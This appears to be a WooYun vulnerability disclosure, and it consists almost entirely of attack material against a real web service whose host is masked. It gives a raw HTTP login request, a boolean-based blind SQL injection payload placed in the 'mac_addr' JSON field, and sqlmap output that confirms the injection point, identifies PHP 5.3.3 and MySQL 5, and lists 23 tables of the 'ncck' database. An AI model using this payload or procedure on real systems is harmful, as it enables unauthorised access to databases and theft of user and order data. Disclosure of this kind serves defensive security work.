WooYun.org

POST /ncck/index.php/login/user_login HTTP/1.1
Content-Length: 79
Content-Type: text/plain; charset=UTF-8
Host: 


mask 区域

*****.*******





Connection: Keep-Alive
{"curr_version":"0","mac_addr":"1*","wk_password":"123456","login_type":"wk_no"}

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: {"curr_version":"0","mac_addr":"1' AND 9239=9239 AND 'aCNt'='aCNt","wk_password":"123456","login_type":"wk_no"}
---
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: {"curr_version":"0","mac_addr":"1' AND 9239=9239 AND 'aCNt'='aCNt","wk_password":"123456","login_type":"wk_no"}
---
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5
Database: ncck
[23 tables]
+--------------------+
| version            |
| adclass            |
| businessclass      |
| chargerecord       |
| communityclass     |
| departmentclass    |
| order_info         |
| order_log          |
| order_source_class |
| orderstatusclass   |
| packageclass       |
| payclass           |
| printtxt           |
| productclass       |
| protocol           |
| respondorderlog    |
| t_role             |
| t_user             |
| t_user_role        |
| today              |
| user_wechat        |
| wkclass            |
| workgroupclass     |
+--------------------+